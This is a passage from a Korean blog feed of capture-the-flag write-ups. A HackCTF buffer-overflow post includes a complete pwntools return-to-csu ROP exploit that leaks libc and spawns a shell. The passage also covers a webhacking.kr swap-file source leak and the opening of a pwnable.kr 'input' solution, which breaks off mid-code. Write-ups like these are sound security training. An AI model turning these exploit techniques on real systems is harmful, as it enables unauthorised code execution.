   0x00000000004005fe &amp;lt;+8&amp;gt;:	mov    rax,QWORD PTR [rip+0x200a4b]        # 0x601050 &amp;lt;stdin@@GLIBC_2.2.5&amp;gt;
   0x0000000000400605 &amp;lt;+15&amp;gt;:	mov    ecx,0x0
   0x000000000040060a &amp;lt;+20&amp;gt;:	mov    edx,0x2
   0x000000000040060f &amp;lt;+25&amp;gt;:	mov    esi,0x0
   0x0000000000400614 &amp;lt;+30&amp;gt;:	mov    rdi,rax
   0x0000000000400617 &amp;lt;+33&amp;gt;:	call   0x4004e0 &amp;lt;setvbuf@plt&amp;gt;
   0x000000000040061c &amp;lt;+38&amp;gt;:	mov    edx,0x15
   0x0000000000400621 &amp;lt;+43&amp;gt;:	mov    esi,0x4006e4
   0x0000000000400626 &amp;lt;+48&amp;gt;:	mov    edi,0x1
   0x000000000040062b &amp;lt;+53&amp;gt;:	mov    eax,0x0
   0x0000000000400630 &amp;lt;+58&amp;gt;:	call   0x4004b0 &amp;lt;write@plt&amp;gt;
   0x0000000000400635 &amp;lt;+63&amp;gt;:	lea    rax,[rbp-0x40]
   0x0000000000400639 &amp;lt;+67&amp;gt;:	mov    edx,0x200
   0x000000000040063e &amp;lt;+72&amp;gt;:	mov    rsi,rax
   0x0000000000400641 &amp;lt;+75&amp;gt;:	mov    edi,0x0
   0x0000000000400646 &amp;lt;+80&amp;gt;:	mov    eax,0x0
   0x000000000040064b &amp;lt;+85&amp;gt;:	call   0x4004c0 &amp;lt;read@plt&amp;gt;
   0x0000000000400650 &amp;lt;+90&amp;gt;:	nop
   0x0000000000400651 &amp;lt;+91&amp;gt;:	leave  
   0x0000000000400652 &amp;lt;+92&amp;gt;:	ret    
End of assembler dump.&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;어셈블리를 확인해보면 write 함수를 사용하여 0x4006e4 주소에 있는 값을 출력하고, read 함수를 사용하여 [rbp-0x40]주소에 사용자로부터 입력을 받는 것으로 확인됩니다. rbp - 0x40에 입력을 받는데 0x200 만큼 입력이 가능한 것을 보면 bof 취약점이 존재하는 것을 확인할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이제 ida를 통해서 __libc_csu_init 함수를 확인해보도록 하겠습니다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1768&quot; data-origin-height=&quot;642&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cGuKnZ/btraqSrQFPV/f1fiBo8bd6TnkYizcuQmKk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cGuKnZ/btraqSrQFPV/f1fiBo8bd6TnkYizcuQmKk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cGuKnZ/btraqSrQFPV/f1fiBo8bd6TnkYizcuQmKk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcGuKnZ%2FbtraqSrQFPV%2Ff1fiBo8bd6TnkYizcuQmKk%2Fimg.png&quot; data-origin-width=&quot;1768&quot; data-origin-height=&quot;642&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;0x4006ba 주소에서 pop하는 레지스터들이 0x4006a0 주소에서 각각 rdi, rsi, rdx에 들어가고 [r12+rbx*8] 값을 호출하는 것을 확인할 수 있습니다. 이를 활용하여 우리가 원하는대로 함수의 흐름을 가져갈 수 있을 것으로 보입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이를 활용하여 작성한 exploit 코드 입니다.&lt;/p&gt;
&lt;pre id=&quot;code_1627231904393&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *

context.log_level='DEBUG'

p = remote(&quot;ctf.j0n9hyun.xyz&quot;, 3025)

set_csu = p64(0x4006BA)
call_csu = p64(0x4006A0)

stdin = p64(0)
stdout = p64(1)

write_plt = p64(0x4004b0)
write_got = p64(0x601018)

read_plt = p64(0x4004c0)
read_got = p64(0x601020)

binsh = &quot;/bin/sh\x00&quot;
bss = p64(0x601050)

read_offset = 0xf7250
system_offset = 0x45390

payload = &quot;&quot;
payload += &quot;A&quot; * 0x48
payload += set_csu
payload += p64(0)
payload += p64(1)
payload += read_got
payload += p64(8)
payload += bss
payload += stdin
payload += call_csu

payload += &quot;A&quot; * 8
payload += p64(0)
payload += p64(1)
payload += write_got
payload += p64(8)
payload += read_got
payload += stdout
payload += call_csu

payload += &quot;A&quot; * 8
payload += p64(0)
payload += p64(1)
payload += read_got
payload += p64(8)
payload += read_got
payload += stdin
payload += call_csu

payload += &quot;A&quot; * 8
payload += p64(0)
payload += p64(0)
payload += read_got
payload += p64(0)
payload += p64(0)
payload += bss
payload += call_csu

p.sendline(payload)

p.recvuntil(&quot;Hey, ROP! What's Up?\n&quot;)
p.send(binsh)

read = u64(p.recv(8))
libcbase = read - read_offset
system_addr = libcbase + system_offset

print system_addr
p.sendline(p64(system_addr))


p.interactive()&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;위와 같이 pwntools를 사용하여 Exploit 코드를 작성하였고 성공적으로 flag 값을 획득할 수 있었습니다.&lt;/p&gt;</description>
      <category>hackctf</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/14</guid>
      <comments>https://zzasgi.tistory.com/14#entry14comment</comments>
      <pubDate>Mon, 26 Jul 2021 01:52:34 +0900</pubDate>
    </item>
    <item>
      <title>[webhacking.kr] old-36번 풀이</title>
      <link>https://zzasgi.tistory.com/11</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1656&quot; data-origin-height=&quot;186&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bkVAhH/btq44dgnOyp/b4lEqFK6xy0wCfPslg94lK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bkVAhH/btq44dgnOyp/b4lEqFK6xy0wCfPslg94lK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bkVAhH/btq44dgnOyp/b4lEqFK6xy0wCfPslg94lK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbkVAhH%2Fbtq44dgnOyp%2Fb4lEqFK6xy0wCfPslg94lK%2Fimg.png&quot; data-origin-width=&quot;1656&quot; data-origin-height=&quot;186&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;old-36번 문제를 들어가보면 영어 문구가 뜨는데 해당 문구를 번역해보면 inedex.php 파일이 편집하는 동안 정전으로 소스코드가 사라졌다고 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이 부분에서 확인해야할 것은 vi 에디터의 복구 파일은 .index.php.swp 와 같은 형식으로 저장이 될 것입니다. 이를 그대로 url로 입력하여 다운로드해서 파일을 확인해보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;474&quot; data-origin-height=&quot;114&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/uhRoH/btq42zYAMRU/no6vEusq59HtHQqOa6O3k1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/uhRoH/btq42zYAMRU/no6vEusq59HtHQqOa6O3k1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/uhRoH/btq42zYAMRU/no6vEusq59HtHQqOa6O3k1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FuhRoH%2Fbtq42zYAMRU%2Fno6vEusq59HtHQqOa6O3k1%2Fimg.png&quot; data-origin-width=&quot;474&quot; data-origin-height=&quot;114&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;webhacking.kr 36번문제 url + .index.php.swp 을 주소창에 입력하면 위 사진과 같이 index.php.swp 파일을 다운로드 받을 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;3022&quot; data-origin-height=&quot;504&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/N9dxC/btq47wGyYYo/C0hP3mZdzjIxkOdCSUkzx1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/N9dxC/btq47wGyYYo/C0hP3mZdzjIxkOdCSUkzx1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/N9dxC/btq47wGyYYo/C0hP3mZdzjIxkOdCSUkzx1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FN9dxC%2Fbtq47wGyYYo%2FC0hP3mZdzjIxkOdCSUkzx1%2Fimg.png&quot; data-origin-width=&quot;3022&quot; data-origin-height=&quot;504&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다운로드 받은 파일의 확장자를 php로 바꿔서 chrome 브라우저로 열어서 페이지 하단을 보니 flag 값을 확인할 수 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1620&quot; data-origin-height=&quot;942&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bnj7xO/btq4ZQNhhp4/RDQzunDVi95muejV0HKED0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bnj7xO/btq4ZQNhhp4/RDQzunDVi95muejV0HKED0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bnj7xO/btq4ZQNhhp4/RDQzunDVi95muejV0HKED0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbnj7xO%2Fbtq4ZQNhhp4%2FRDQzunDVi95muejV0HKED0%2Fimg.png&quot; data-origin-width=&quot;1620&quot; data-origin-height=&quot;942&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;파일의 hex 값을 확인해봐도 flag 값을 확인할 수 있었습니다.&lt;/p&gt;</description>
      <category>webhacking.kr</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/11</guid>
      <comments>https://zzasgi.tistory.com/11#entry11comment</comments>
      <pubDate>Mon, 17 May 2021 03:24:41 +0900</pubDate>
    </item>
    <item>
      <title>[pwnable.kr] input 풀이</title>
      <link>https://zzasgi.tistory.com/10</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1672&quot; data-origin-height=&quot;846&quot; width=&quot;777&quot; height=&quot;393&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xLM2B/btq4XxGukTT/DZ7URFNrPkwmJ4frsCtZe0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xLM2B/btq4XxGukTT/DZ7URFNrPkwmJ4frsCtZe0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xLM2B/btq4XxGukTT/DZ7URFNrPkwmJ4frsCtZe0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FxLM2B%2Fbtq4XxGukTT%2FDZ7URFNrPkwmJ4frsCtZe0%2Fimg.png&quot; data-origin-width=&quot;1672&quot; data-origin-height=&quot;846&quot; width=&quot;777&quot; height=&quot;393&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;ssh input2@pwnable.kr -p2222 로 접속해서 ls 명령어로 어떤 파일들이 있는지 확인해봤는데 flag, input, input.c 세개의 파일이 있다.&amp;nbsp;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;184&quot; width=&quot;777&quot; height=&quot;112&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/JdZNX/btq4Ur1L6SX/8z8Zbm1xIBVKOc0gcSIN00/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/JdZNX/btq4Ur1L6SX/8z8Zbm1xIBVKOc0gcSIN00/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/JdZNX/btq4Ur1L6SX/8z8Zbm1xIBVKOc0gcSIN00/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJdZNX%2Fbtq4Ur1L6SX%2F8z8Zbm1xIBVKOc0gcSIN00%2Fimg.png&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;184&quot; width=&quot;777&quot; height=&quot;112&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;input을 실행해보면 다음과 같은 메시지를 출력하고 종료된다. 올바른 input을 보내면 flag값을 받을 수 있다고 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;input.c 파일을 확인해보도록 합시다.&lt;/p&gt;
&lt;pre id=&quot;code_1620989658054&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;arpa/inet.h&amp;gt;

int main(int argc, char* argv[], char* envp[]){
	printf(&quot;Welcome to pwnable.kr\n&quot;);
	printf(&quot;Let's see if you know how to give input to program\n&quot;);
	printf(&quot;Just give me correct inputs then you will get the flag :)\n&quot;);

	// argv
	if(argc != 100) return 0;
	if(strcmp(argv['A'],&quot;\x00&quot;)) return 0;
	if(strcmp(argv['B'],&quot;\x20\x0a\x0d&quot;)) return 0;
	printf(&quot;Stage 1 clear!\n&quot;);	

	// stdio
	char buf[4];
	read(0, buf, 4);
	if(memcmp(buf, &quot;\x00\x0a\x00\xff&quot;, 4)) return 0;
	read(2, buf, 4);
        if(memcmp(buf, &quot;\x00\x0a\x02\xff&quot;, 4)) return 0;
	printf(&quot;Stage 2 clear!\n&quot;);
	
	// env
	if(strcmp(&quot;\xca\xfe\xba\xbe&quot;, getenv(&quot;\xde\xad\xbe\xef&quot;))) return 0;
	printf(&quot;Stage 3 clear!\n&quot;);

	// file
	FILE* fp = fopen(&quot;\x0a&quot;, &quot;r&quot;);
	if(!fp) return 0;
	if( fread(buf, 4, 1, fp)!=1 ) return 0;
	if( memcmp(buf, &quot;\x00\x00\x00\x00&quot;, 4) ) return 0;
	fclose(fp);
	printf(&quot;Stage 4 clear!\n&quot;);	

	// network
	int sd, cd;
	struct sockaddr_in saddr, caddr;
	sd = socket(AF_INET, SOCK_STREAM, 0);
	if(sd == -1){
		printf(&quot;socket error, tell admin\n&quot;);
		return 0;
	}
	saddr.sin_family = AF_INET;
	saddr.sin_addr.s_addr = INADDR_ANY;
	saddr.sin_port = htons( atoi(argv['C']) );
	if(bind(sd, (struct sockaddr*)&amp;amp;saddr, sizeof(saddr)) &amp;lt; 0){
		printf(&quot;bind error, use another port\n&quot;);
    		return 1;
	}
	listen(sd, 1);
	int c = sizeof(struct sockaddr_in);
	cd = accept(sd, (struct sockaddr *)&amp;amp;caddr, (socklen_t*)&amp;amp;c);
	if(cd &amp;lt; 0){
		printf(&quot;accept error, tell admin\n&quot;);
		return 0;
	}
	if( recv(cd, buf, 4, 0) != 4 ) return 0;
	if(memcmp(buf, &quot;\xde\xad\xbe\xef&quot;, 4)) return 0;
	printf(&quot;Stage 5 clear!\n&quot;);

	// here's your flag
	system(&quot;/bin/cat flag&quot;);	
	return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;코드를 확인해보니 5단계의 stage가 있고 각 stage별로 요구 조건을 만족 시켜야 해당 stage를 벗어나 다음 stage 코드로 이동을 할 수 있습니다. 우선 첫 번째 stage의 clear 조건을 확인해보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1621055610778&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;// argv
	if(argc != 100) return 0;
	if(strcmp(argv['A'],&quot;\x00&quot;)) return 0;
	if(strcmp(argv['B'],&quot;\x20\x0a\x0d&quot;)) return 0;
	printf(&quot;Stage 1 clear!\n&quot;);&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;첫&amp;nbsp; 번째 stage는 argc를 100으로 맞춰준 뒤 argv[65] 와 argv[66]에 각각 필요로 하는 문자열로 맞춰줘야 if문을 벗어날 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1897&quot; data-origin-height=&quot;110&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Zkqlf/btq4WFltqXL/FYbNdNSotEhtQsXPUUQIk0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Zkqlf/btq4WFltqXL/FYbNdNSotEhtQsXPUUQIk0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Zkqlf/btq4WFltqXL/FYbNdNSotEhtQsXPUUQIk0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FZkqlf%2Fbtq4WFltqXL%2FFYbNdNSotEhtQsXPUUQIk0%2Fimg.png&quot; data-origin-width=&quot;1897&quot; data-origin-height=&quot;110&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;그래서 위 그림과 같이 argv[65] 와 argv[66]에 필요로 하는 문자열을 주어 실행해봤습니다. 하지만 if문을 벗어나지 못했습니다. 왜 stage1을 clear하지 못하는지 이해가 되지 않아서 이 문제는 다른 분들의 writeup을 보면서 풀게 되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1623854726254&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *

p = ssh(user=&quot;input2&quot;, host=&quot;pwnable.kr&quot;, port=2222, password=&quot;guest&quot;)

arg = [str(i) for i in range(100)]
arg[65] = &quot;\x00&quot;
arg[66] = &quot;\x20\x0a\x0d&quot;

p2 = p.process(executable=&quot;/home/input2/input&quot;, argv=arg)

print (p2.recvuntil('clear!'))
&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;pwntools를 사용해서 argv 100개를 할당하고 arg[65] 와 arg[66]에 주어진 조건대로 맞춰준 후 input 파일을 실행하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;2748&quot; data-origin-height=&quot;336&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c2fp3R/btq7vlikNgS/nn5MjMxAOx7evEOjAER2pK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c2fp3R/btq7vlikNgS/nn5MjMxAOx7evEOjAER2pK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c2fp3R/btq7vlikNgS/nn5MjMxAOx7evEOjAER2pK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc2fp3R%2Fbtq7vlikNgS%2Fnn5MjMxAOx7evEOjAER2pK%2Fimg.png&quot; data-origin-width=&quot;2748&quot; data-origin-height=&quot;336&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 코드를 사용하여 input 파일을 실행하였더니 Stage1이 clear된 것을 확인하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1623853974440&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;// stdio
	char buf[4];
	read(0, buf, 4);
	if(memcmp(buf, &quot;\x00\x0a\x00\xff&quot;, 4)) return 0;
	read(2, buf, 4);
        if(memcmp(buf, &quot;\x00\x0a\x02\xff&quot;, 4)) return 0;
	printf(&quot;Stage 2 clear!\n&quot;);&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Stage2는&amp;nbsp; read함수로 buf에 사용자로부터 문자열을 입력 받았을때 입력 값이 &quot;\x00\x0a\x00\xff&quot;여야 하고 표준 에러가 &quot;\x00\x0a\x02\xff&quot;를 만족해야 클리어되는 단계 입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;표준 에러를 어떻게 설정해주는지 몰랐는데 write up을 보니 pwntools에 표준 에러를 설정하는 기능이 있다고 하여 write up을 보고&amp;nbsp; pwntools를 사용하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1623857069236&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *

p = ssh(user=&quot;input2&quot;, host=&quot;pwnable.kr&quot;, port=2222, password=&quot;guest&quot;)

arg = [str(i) for i in range(100)]
arg[65] = &quot;\x00&quot;
arg[66] = &quot;\x20\x0a\x0d&quot;

p.write('/tmp/err', &quot;\x00\x0a\x02\xff&quot;)

p2 = p.process(executable=&quot;/home/input2/input&quot;, argv=arg, stderr=&quot;/tmp/err&quot;)

payload = &quot;\x00\x0a\x00\xff&quot;

p2.send(payload)

print (p2.recvuntil('Stage 2 clear!'))
&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Stage2 조건문까지 만족시킨 코드 입니다. tmp에 write 권한이 있어 표준에러로 사용할 파일을 만들어준 후 표준 에러를 만들어준 파일로 설정한 후 buf에 입력할 값도 맞춰주었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;2900&quot; data-origin-height=&quot;366&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/2YWe0/btq7s7ejaMi/LJr8cWAbWAUC8PJqQzhEnk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/2YWe0/btq7s7ejaMi/LJr8cWAbWAUC8PJqQzhEnk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/2YWe0/btq7s7ejaMi/LJr8cWAbWAUC8PJqQzhEnk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F2YWe0%2Fbtq7s7ejaMi%2FLJr8cWAbWAUC8PJqQzhEnk%2Fimg.png&quot; data-origin-width=&quot;2900&quot; data-origin-height=&quot;366&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;pwntools로 작성한 코드 실행 결과 정상적으로 2단계 까지 클리어한 것을 확인했습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1625406338500&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;// env
	if(strcmp(&quot;\xca\xfe\xba\xbe&quot;, getenv(&quot;\xde\xad\xbe\xef&quot;))) return 0;
	printf(&quot;Stage 3 clear!\n&quot;);
&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Stage3은 환경변수 '\xde\xad\xbe\xef' 에 '\xca\xfe\xba\xbe'가 들어있으면 됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1625406435338&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;// file
	FILE* fp = fopen(&quot;\x0a&quot;, &quot;r&quot;);
	if(!fp) return 0;
	if( fread(buf, 4, 1, fp)!=1 ) return 0;
